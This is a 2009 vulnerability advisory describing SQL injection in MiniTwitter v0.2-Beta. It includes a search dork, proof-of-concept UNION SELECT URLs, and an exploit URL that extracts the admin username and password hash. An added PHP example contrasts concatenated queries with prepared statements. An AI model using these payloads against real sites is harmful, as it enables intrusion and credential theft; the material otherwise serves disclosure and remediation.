MiniTwitter v0.2-Beta SQL Injections

2009.07.23
Credit: y3nh4ck3r
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

---------------------------------------------------------------------
MULTIPLE SQL INJECTION VULNERABILITIES --MiniTwitter v0.2-Beta-->
---------------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://mt.bioscriptsdb.com/
-->DOWNLOAD: http://sourceforge.net/projects/minitt/
-->DEMO: http://www.bioscripts.net/minitwitter/index.php
-->CATEGORY: Social Networking
-->DESCRIPTION: Your business needs a private twitter. You can add... several twitters account and use this twitter as a backup of all...
-->RELEASED: 2009-04-30

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "BioScripts"
-->CATEGORY: SQL INJECTION (SQLi)
-->AFFECT VERSION: <= 0.2 Beta
-->Discovered Bug date: 2009-04-30
-->Reported Bug date: 2009-04-30
-->Fixed bug date: 2009-05-01
-->Info patch (0.3 Beta): http://sourceforge.net/projects/minitt/
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (I love you, little one!)

##############################
//////////////////////////////
SQL INJECTION (SQLi):
//////////////////////////////
##############################

<<<<---------++++++++++++++ Condition-1: magic_quotes_gpc=off +++++++++++++++++--------->>>>
<<<<---------++++++++++++++ Condition-2: Be a registered user +++++++++++++++++--------->>>>

This application is completely vulnerable to SQL injection.

-----
PoC:
-----

File: index.php
Var: GET var 'user'

--> http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+1,version()/*

Return --> Database version.

File: inc/rss.php
Var: GET var 'user'

--> http://[HOST]/[HOME_PATH]/rss.php?user=2%27+UNION+ALL+SELECT+user(),2/*

Return --> Database user.

---------
EXPLOIT:
---------

http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+2,concat(nick,0x3A3A3A,password)+FROM+mt_users+WHERE+id_usr=1/*

Return --> nick:::password(md5 hash)

<<<-----------------------------EOF---------------------------------->>>

ENJOY IT!
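
Added example (not part of the original advisory and not MiniTwitter's code): a hypothetical 'user' lookup written first with string concatenation, the pattern that makes the PoC above work when magic_quotes_gpc is off, and then with a bound parameter. Assumptions: the query text, function names and sample rows are constructed, and an in-memory SQLite database stands in for MySQL, so concat() is written with || in the decoded input.

```php
<?php
// Added illustration: hypothetical lookup code, NOT MiniTwitter's source.
// mt_users, id_usr, nick and password are named in the advisory; the rows,
// the query text and both functions below are constructed for this example.
$db = new PDO('sqlite::memory:'); // SQLite stands in for MySQL so this runs offline
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE mt_users (id_usr INTEGER PRIMARY KEY, nick TEXT, password TEXT)");
$db->exec("INSERT INTO mt_users VALUES (1, 'admin', 'constructed-hash-1')");
$db->exec("INSERT INTO mt_users VALUES (2, 'guest', 'constructed-hash-2')");

// Vulnerable pattern: the GET value is pasted between quotes, so a quote in
// the value ends the string literal and the rest is parsed as SQL.
function lookupConcatenated(PDO $db, string $user): array
{
    $sql = "SELECT id_usr, nick FROM mt_users WHERE id_usr = '" . $user . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened pattern: the statement text is fixed and the value is bound as
// data, so quotes and SQL keywords inside it are never parsed.
function lookupPrepared(PDO $db, string $user): array
{
    $st = $db->prepare("SELECT id_usr, nick FROM mt_users WHERE id_usr = ?");
    $st->execute([$user]);
    return $st->fetchAll(PDO::FETCH_NUM);
}

// URL-decoded form of the 'user' value from the EXPLOIT section above
// (concat(...) rewritten as || for SQLite).
$input = "2' UNION ALL SELECT 2, nick || ':::' || password FROM mt_users WHERE id_usr=1/*";

$leaky = lookupConcatenated($db, $input);
printf("concatenated query: %d row(s)\n", count($leaky));
foreach ($leaky as $row) {
    echo "  ", implode(' | ', $row), "\n"; // second row carries nick:::password
}

$safe = lookupPrepared($db, $input);
printf("prepared statement, same input: %d row(s)\n", count($safe));

$normal = lookupPrepared($db, '2');
printf("prepared statement, user=2: %s\n", $normal[0][1]);
```

The bound-parameter form does not depend on magic_quotes_gpc, which was removed in PHP 5.4.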

References:

http://xforce.iss.net/xforce/xfdb/50282
http://www.securityfocus.com/bid/34795
http://www.securityfocus.com/archive/1/archive/1/503155/100/0/threaded
http://www.milw0rm.com/exploits/8586


Copyright 2024, cxsecurity.com

 
